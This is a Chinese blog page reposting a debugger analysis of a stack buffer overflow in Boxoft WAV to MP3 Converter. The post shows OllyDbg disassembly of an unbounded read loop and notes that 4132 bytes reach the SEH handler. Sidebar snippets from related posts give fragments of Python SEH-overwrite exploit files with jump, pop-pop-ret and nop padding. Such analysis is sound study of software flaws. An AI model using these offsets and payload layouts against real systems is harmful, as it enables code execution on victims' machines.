boxoft wav to mp3漏洞分析

最新推荐文章于 2021-06-02 19:29:44 发布
最新推荐文章于 2021-06-02 19:29:44 发布
阅读量275 收藏
点赞数
原文链接:http://www.cnblogs.com/wj2ge/p/5893460.html
版权

 

漏洞:https://www.exploit-db.com/exploits/38456/

作者:wj2ge

测试环境:xp sp3

根据提供的EXP

然后OD附加调试,在ReadFile函数下断点,然后f9运行 点击PLAY

我们为了先大致看一下程序的执行流程,一直F8

发现一直在swich case里 循环

 

 

004BA881  |> /8BC7          /mov eax,edi

004BA883  |. |83F8 04       |cmp eax,0x4                             ;  Switch (cases 0..4)

004BA886  |. |0F87 FD040000 |ja wavtomp3.004BAD89

004BA88C  |. |FF2485 93A84B>|jmp dword ptr ds:[eax*4+0x4BA893]

004BA893  |. |A7A84B00      |dd wavtomp3.004BA8A7                    ;  分支表 被用于 004BA88C

004BA897  |. |EEA84B00      |dd wavtomp3.004BA8EE

004BA89B  |. |35A94B00      |dd wavtomp3.004BA935

004BA89F  |. |F5AB4B00      |dd wavtomp3.004BABF5

004BA8A3  |. |E9AC4B00      |dd wavtomp3.004BACE9

004BA8A7  |> |BA D4AD4B00   |mov edx,wavtomp3.004BADD4               ;  ASCII "RIFF"; Case 0 of switch 004BA883        主要在这个case0

004BA8AC  |. |8D4434 08     |lea eax,dword ptr ss:[esp+esi+0x8]

004BA8B0  |. |E8 B7F3FFFF   |call wavtomp3.004B9C6C

004BA8B5  |. |84C0          |test al,al

004BA8B7  |. |75 17         |jnz Xwavtomp3.004BA8D0

004BA8B9  |. |8D5434 0C     |lea edx,dword ptr ss:[esp+esi+0xC]

004BA8BD  |. |B9 01000000   |mov ecx,0x1

004BA8C2  |. |8B43 60       |mov eax,dword ptr ds:[ebx+0x60]

004BA8C5  |. |8B28          |mov ebp,dword ptr ds:[eax]

004BA8C7  |. |FF55 0C       |call [arg.2]  这个函数每CALL一次堆栈里就多一个word的数 据

004BA8CA  |. |46            |inc esi

004BA8CB  |. |E9 B9040000   |jmp wavtomp3.004BAD89

004BA8D0  |> |8D5434 0C     |lea edx,dword ptr ss:[esp+esi+0xC]

004BA8D4  |. |B9 04000000   |mov ecx,0x4

004BA8D9  |. |8B43 60       |mov eax,dword ptr ds:[ebx+0x60]

004BA8DC  |. |8B38          |mov edi,dword ptr ds:[eax]

004BA8DE  |. |FF57 0C       |call dword ptr ds:[edi+0xC]

 

一直在Case0循环未对长度做出限制导致溢出 查找最近的SEH12FB3C4132个字节刚好覆盖到

形成一个典型的溢出SEH漏洞利用过程

转载于:https://www.cnblogs.com/wj2ge/p/5893460.html

weixin_30276935
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Boxoft WAV to MP3 Converter 1.1 漏洞分析及利用[SEH]
qq_36811299的博客
08-16 962
BoxSoft WAV to MP3 Converter缓冲区溢出
Boxoft wav to mp3 converter SEH bypass technique tested on XP SP3
JacobTsang的博客
10-08 1004
#一定要用Python2进行编译。否则Exploit无效。 Python2 Exploit: f = open("Expolit.aiff", "w") f.write("A" * 4132) # 4136 - 4 f.write("\xeb\x06\x90\x90") # jmp 06 nop nop f.write("\xa4\x43\x40\x00") # 构造 pop pop ret ...
FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞
youshangfashi的博客
05-10 501
FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞 这里写目录标题FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞简介调试环境软件简介调试简介POC调试分析漏洞利用参考 简介 调试环境  winxp sp3、windbg、ollydbg、IDA  软件下载地址https://www.exploit-db.com/apps/21fdca9b7d302479e989b9d062a276df-FWMCSetup.exe 软件简介  Fr
Free CD to MP3 Converter V3.1 栈溢出漏洞分析与利用
youshangfashi的博客
04-25 303
Free CD to MP3 Converter V3.1 栈溢出漏洞分析与利用 测试环境及工具: windbg IDA winxp sp3 这算是正式调试分析的第一个漏洞,也是跟着一位学长的博客做一个复现(原博客地址在文末)。这款软件是一款音频文件转换的软件,漏洞是未检查输入文件长度而导致的缓存区溢出。因为本地缓存溢出比较简单,所以适合新手。具体分析如下: 这是原博客的exp filenam...
SEH溢出攻击
dasgk的专栏
10-01 1639
环境使用:WIN7 ,VS2010,攻击具有溢出漏洞的程序,其源代码如下 #include "stdafx.h" #include   #include #include using namespace std; int main() { HANDLE hLib=LoadLibraryA("D:\\project\\dll\\Debug\\dll.dll"); FARPROC
二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit
「鸿渐之翼」的博客
05-04 643
此次渗透测试针对软件 转换大师Boxoft Convert Master ‘wav’ SEH 本地攻击 实验平台:windows7 poc由Achilles提供 exp: import struct buffer = "\x41" * 4132 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x6d00c683) #CDRip122.dll nops = "\x90" * 20 #Bind=shellcode por
html转换wma,WMA格式转换器(Boxoft All to WMA Converter)
weixin_33420201的博客
06-02 126
Boxoft All to WMA Converter是一款功能强大的WMA格式转换器,软件可以转换多种音频文件的软件,支持多种格式软件,而且还支持批量处理,它还允许您在后台转换或使用命令行。有需要的小伙伴欢迎来西西下载体验。软件功能:1、永远免费升级所有的产品都可以免费升级,一旦你购买了软件,你就可以永远使用它。我们保留为以后版本定价的权利,但您不需要支付一分钱用于升级。2、集成音频转换器BOX...
BoxoftFLVConverter(FLV文件转换器)V1.0免费安装版
08-07
Boxoft FLV Converter是一个强大的批处理软件,你可以转换FLV文件变成其他视频或音频格式的文件,还设置图像帧数大小、视频大小、音频编解码器和其他参数,以此来创建自己的风格MP4、MPEG、WMV、MP3文件。...
BoxoftWMAtoWavconverter(音频转换工具)v1.0免费安装版
07-25
Boxoft WMA to Wav converter是一款不错的音频转换工具,使用该工具可以轻松的将WMA音频批量转换为高质量的WAV音频格式,效率非常的高,支持批量转换,欢迎有需要的前来下载使用! Boxoft WMA to Wav converter介绍...
BoxoftPhotoMagicMaker(免费照片装饰工具)V1.2免费安装版
08-06
Boxoft Photo Magic Maker是一款十分优秀的照片装饰助手。它为您提供全方位的魔术效果润色您的照片,只简单的点击,你就可以创造出令人惊叹的照片与多重惊人的效果,还能享受有趣的装饰过程,使您的照片更加动人可爱...
BoxoftPDFtoFlash(PDF文件批量转换FLASH)V1.1免费安装版
08-06
Boxoft PDF to Flash(PDF文件批量转换FLASHF)是一款功能非常强大的PDF转FLASH工具。一直不知道PDF文件该怎么转换成FLASHF?那就快试试脚本之家小编推荐的Boxoft PDF to Flash最新版下载使用。能够为你对PDF文件进行...
MP4转MPG格式工具BoxoftFreeMP4toMPGConverter1.0官方安装版
08-07
Boxoft Free MP4 to MPG Converter是一款功能强大的MP4转MPG格式工具,可以处理多种视频格式。Boxoft Free MP4 to MPG Converter使用起来过程十分简单、快速。Boxoft Free MP4 to MPG Converter支持批量转换,可以...
取暖锅炉管理制度.docx
07-09
取暖锅炉管理制度
“人力资源+大数据+薪酬报告+涨薪调薪”
最新发布
07-09
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
述职报告(24)PPT模板.pptx
07-09
述职报告(24)PPT模板.pptx
pxie-8822-用户手册.pdf
07-09
pxie-8822_用户手册.pdf
学校消防防火安全公约.docx
07-09
学校消防防火安全公约
医疗保险费退费申请表.xlsx
07-09
医疗保险费退费申请表.xlsx
boxoft converttomp3漏洞
11-22
boxoft converttomp3是一个用于将视频文件转换为音频文件的软件,但是它存在一些安全漏洞。这些漏洞可能会导致用户的个人信息泄露,或者黑客利用漏洞进行恶意攻击。 首先,boxoft converttomp3存在文件输入限制不严...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值